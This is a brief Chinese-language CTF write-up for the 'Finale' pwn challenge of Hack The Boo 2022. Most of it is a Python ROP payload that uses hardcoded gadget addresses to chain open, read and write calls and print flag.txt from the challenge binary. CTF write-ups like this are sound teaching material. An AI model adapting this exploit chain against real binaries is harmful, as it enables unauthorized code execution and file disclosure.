# Hack The Boo 2022 /Finale ###### tags: `CTF`,`PWN`,`writeup` 檔案連結:http://gofile.me/6lhQ2/Xy7LIzLt7  沒有canary跟PIE其實對題目沒影響，出題者是個好老師，每一題都很明確 題目說明得很清楚，用的是非公版libc，意思就是要你乖乖用rop，出題者很好心的幫你備齊了open、read、write，來複習一下  ``` pop_rdi = 0x00000000004012d6 # pop rdi; ret; pop_rsi = 0x00000000004012d8 # pop rsi; ret; # adc edx, dword ptr [rbp + 0x48]; mov ebp, esp; call 0x1230; mov byte ptr [rip + 0x2d6b], 1; pop rbp; ret; adc_rdx = 0x00000000004012ac pop_rbp = 0x00000000004012bd # pop rbp; ret; payload = b"\x20".ljust(64, b"\x00") # \x20是read及write的rdx payload += p64(rsp) payload += p64(pop_rdi) payload += p64(rsp+8*29) # "flag.txt" payload += p64(pop_rsi) payload += p64(0) payload += p64(elf1.symbols["open"]) # call open() payload += p64(pop_rbp) payload += p64(rsp-0x48) payload += p64(adc_rdx) # 會在rbp-0x40取edx payload += p64(rsp+0x100) # 重新注入rbp payload += p64(pop_rdi) payload += p64(3) # fd payload += p64(pop_rsi) payload += p64(rsp) # buf payload += p64(elf1.symbols["read"]) # call read() payload += p64(pop_rdi) payload += p64(1) # stdout payload += p64(pop_rsi) payload += p64(rsp) # buf payload += p64(elf1.symbols["write"]) # call write() payload += p64(elf1.symbols["finale"]) payload += b"flag.txt" payload += p64(0) ```